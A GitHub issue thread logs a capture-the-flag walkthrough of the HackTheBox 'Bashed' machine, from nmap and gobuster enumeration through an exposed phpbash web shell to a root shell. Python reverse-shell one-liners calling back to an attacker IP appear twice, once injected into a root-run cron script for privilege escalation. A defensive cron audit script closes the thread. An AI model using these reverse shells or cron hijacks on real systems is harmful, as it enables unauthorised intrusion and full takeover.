roaris / ctf-log


HackTheBox: Bashed (Machine Easy) #8

Open roaris opened 6 months ago

roaris commented 6 months ago

https://app.hackthebox.com/machines/Bashed

$ nmap -sC -sV -Pn 10.10.10.68
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-24 17:22 JST
Nmap scan report for 10.10.10.68
Host is up (0.35s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Arrexel's Development Site
|_http-server-header: Apache/2.4.18 (Ubuntu)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 53.03 seconds
roaris commented 6 months ago

Accessing port 80 opens an introduction page for phpbash. It appears to be a script that, once uploaded to a target site, acts as a shell inside the browser.

roaris commented 6 months ago

Since the page says "I actually developed it on this exact server!", I tried accessing /phpbash.php, /phpbash.min.php, /uploads/phpbash.php and /uploads/phpbash.min.php, but all of them returned Not Found.

roaris commented 6 months ago

Use gobuster.

$ gobuster dir --url http://10.10.10.68 --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.68
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 311] [--> http://10.10.10.68/images/]
/uploads              (Status: 301) [Size: 312] [--> http://10.10.10.68/uploads/]
/php                  (Status: 301) [Size: 308] [--> http://10.10.10.68/php/]
/css                  (Status: 301) [Size: 308] [--> http://10.10.10.68/css/]
/dev                  (Status: 301) [Size: 308] [--> http://10.10.10.68/dev/]
/js                   (Status: 301) [Size: 307] [--> http://10.10.10.68/js/]
/fonts                (Status: 301) [Size: 310] [--> http://10.10.10.68/fonts/]
Progress: 10399 / 87665 (11.86%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 10408 / 87665 (11.87%)
===============================================================
Finished
===============================================================

It was taking too long, so I interrupted it partway. Accessing /dev/ shows that phpbash.php is there.

roaris commented 6 months ago

user.txt is in /home/arrexel.

Trying to access root gives Permission denied.

www-data@bashed:/# ls root
ls: cannot open directory 'root': Permission denied

Apparently it cannot be accessed with www-data's privileges (about www-data: https://qiita.com/micron/items/56cdc72112f2f9b09fa2).

www-data@bashed:/# id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@bashed:/# ls -l .
total 80
drwxr-xr-x 2 root root 4096 Jun 2 2022 bin
drwxr-xr-x 3 root root 4096 Jun 2 2022 boot
drwxr-xr-x 19 root root 4140 Feb 24 00:20 dev
drwxr-xr-x 89 root root 4096 Jun 2 2022 etc
drwxr-xr-x 4 root root 4096 Dec 4 2017 home
lrwxrwxrwx 1 root root 32 Dec 4 2017 initrd.img -> boot/initrd.img-4.4.0-62-generic
drwxr-xr-x 19 root root 4096 Dec 4 2017 lib
drwxr-xr-x 2 root root 4096 Jun 2 2022 lib64
drwx------ 2 root root 16384 Dec 4 2017 lost+found
drwxr-xr-x 4 root root 4096 Dec 4 2017 media
drwxr-xr-x 2 root root 4096 Jun 2 2022 mnt
drwxr-xr-x 2 root root 4096 Dec 4 2017 opt
dr-xr-xr-x 170 root root 0 Feb 24 00:20 proc
drwx------ 3 root root 4096 Feb 24 00:21 root
drwxr-xr-x 18 root root 500 Feb 24 00:20 run
drwxr-xr-x 2 root root 4096 Dec 4 2017 sbin
drwxrwxr-- 2 scriptmanager scriptmanager 4096 Jun 2 2022 scripts
drwxr-xr-x 2 root root 4096 Feb 15 2017 srv
dr-xr-xr-x 13 root root 0 Feb 24 01:03 sys
drwxrwxrwt 10 root root 4096 Feb 24 01:05 tmp
drwxr-xr-x 10 root root 4096 Dec 4 2017 usr
drwxr-xr-x 12 root root 4096 Jun 2 2022 var
lrwxrwxrwx 1 root root 29 Dec 4 2017 vmlinuz -> boot/vmlinuz-4.4.0-62-generic

su and sudo do not work either.

www-data@bashed:/# su
su: must be run from a terminal
www-data@bashed:/# sudo cd root
sudo: no tty present and no askpass program specified
roaris commented 6 months ago

Looking at /home shows that there is a user called scriptmanager.

www-data@bashed:/var/www/html/dev# ls /home
arrexel
scriptmanager

There was also a writeup that checked with sudo -l: https://sanposhiho.com/posts/2020-03-15-qiita-494679a0edc89fe4375e

www-data@bashed:/# sudo -l
Matching Defaults entries for www-data on bashed:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on bashed:
(scriptmanager : scriptmanager) NOPASSWD: ALL

I do not quite understand what the -l option means.

-l, --list                    list user's privileges or check a specific
                              command; use twice for longer format
roaris commented 6 months ago

/scripts is accessible only by scriptmanager.

drwxrwxr-- 2 scriptmanager scriptmanager 4096 Jun 2 2022 scripts

I try to switch to scriptmanager with sudo -u scriptmanager /bin/bash, but for some reason it does not work from within phpbash.

If I start a reverse shell first and then run sudo -u scriptmanager /bin/bash, the switch works.

For the reverse shell I use the Python one from https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/#python

python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.16.3",8080));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
$ nc -lvp 8080
listening on [any] 8080 ...
10.10.10.68: inverse host lookup failed: Unknown host
connect to [10.10.16.3] from (UNKNOWN) [10.10.10.68] 41084
$ whoami
whoami
www-data
$ sudo -u scriptmanager /bin/bash
sudo -u scriptmanager /bin/bash
scriptmanager@bashed:/$ whoami
whoami
scriptmanager
scriptmanager@bashed:/$
roaris commented 6 months ago

Checking the contents of the scripts directory. I cannot imagine this being a clue...

scriptmanager@bashed:/scripts$ ls
ls
test.py  test.txt
scriptmanager@bashed:/scripts$ cat test.py
cat test.py
f = open("test.txt", "w")
f.write("testing 123!")
f.close
scriptmanager@bashed:/scripts$ cat test.txt
cat test.txt
testing 123!scriptmanager@bashed:/scripts$
roaris commented 6 months ago

Checking with ls -l, the modification time of test.txt is the current time, and its owner is root.

scriptmanager@bashed:/scripts$ ls -l
ls -l
total 8
-rw-r--r-- 1 scriptmanager scriptmanager 58 Dec  4  2017 test.py
-rw-r--r-- 1 root          root          12 Feb 24 03:10 test.txt

This machine uses PST (US Pacific Standard Time); adding 17 hours gives JST. The date command confirms that PST is in use.

scriptmanager@bashed:/scripts$ date
date
Sat Feb 24 03:10:37 PST 2024

The modification time of test.txt changes every minute.

Combined with test.txt being owned by root, it can be inferred that test.py is being run periodically by the root user. scriptmanager can edit test.py, so editing it to spawn a reverse shell gives a root shell.

roaris commented 6 months ago

Write the same reverse shell program as before (only the port number changed) into test.py with echo.

scriptmanager@bashed:/scripts$ echo 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.16.3",8081));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")' > test.py

Listening on port 8081, I got a root shell.

$ nc -lvp 8081
listening on [any] 8081 ...
10.10.10.68: inverse host lookup failed: Unknown host
connect to [10.10.16.3] from (UNKNOWN) [10.10.10.68] 59914
# whoami
whoami
root

Display /root/root.txt and we are done.

It can be confirmed that the script is run periodically by cron: https://0xdf.gitlab.io/2018/04/29/htb-bashed.html

# crontab -l
crontab -l
* * * * * cd /scripts; for f in *.py; do python "$f"; done

* * * * * means every minute: https://qiita.com/UNILORN/items/a1a3f62409cdb4256219
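As an added example (not part of this issue thread), the same root cause seen from the defender's side: a small audit script that parses root's crontab entry and the `ls -l /` line for /scripts quoted above, and flags any root cron job that runs out of a directory a non-root user can write to. The inputs are constructed from the output in this thread; the function names are my own.

```python
import re

# Constructed inputs mirroring what this thread observed on the box: root's crontab
# entry and `ls -l /` lines for two top-level directories.
ROOT_CRONTAB = """\
# m h dom mon dow command
* * * * * cd /scripts; for f in *.py; do python "$f"; done
"""
LS_L_ROOT = """\
drwxrwxr-- 2 scriptmanager scriptmanager 4096 Jun 2 2022 scripts
drwxrwxrwt 10 root root 4096 Feb 24 01:05 tmp
"""

def parse_ls_l(text):
    """Map '/name' -> (mode, owner, group) for each directory line of `ls -l /`."""
    dirs = {}
    for line in text.splitlines():
        parts = line.split(None, 8)
        if len(parts) == 9 and parts[0].startswith("d"):
            dirs["/" + parts[8]] = (parts[0], parts[2], parts[3])
    return dirs

def cron_cd_targets(crontab):
    """Return (schedule, absolute_dir) for every job whose command cd's into a directory."""
    targets = []
    for line in crontab.splitlines():
        fields = line.strip().split(None, 5)  # five schedule fields, then the command
        if not fields or fields[0].startswith("#") or len(fields) < 6:
            continue
        schedule, command = " ".join(fields[:5]), fields[5]
        for directory in re.findall(r"\bcd\s+(/[^\s;]+)", command):
            targets.append((schedule, directory))
    return targets

def writable_by_non_root(mode, owner, group):
    """True if a user other than root can create or replace files in the directory."""
    owner_w, group_w, other_w = mode[2] == "w", mode[5] == "w", mode[8] == "w"
    return (owner_w and owner != "root") or (group_w and group != "root") or other_w

def audit(crontab, ls_output):
    """Findings: root cron jobs that execute out of a directory a non-root user can write."""
    dirs = parse_ls_l(ls_output)
    findings = []
    for schedule, directory in cron_cd_targets(crontab):
        info = dirs.get(directory)
        if info and writable_by_non_root(*info):
            findings.append(f"{directory} ({info[0]} {info[1]}:{info[2]}) run by root at '{schedule}'")
    return findings
```

On this box `audit(ROOT_CRONTAB, LS_L_ROOT)` reports /scripts, since root executes every *.py there each minute while scriptmanager owns the directory; the fix is to have root-run scripts live in a root-owned directory (or drop the job to scriptmanager's own crontab).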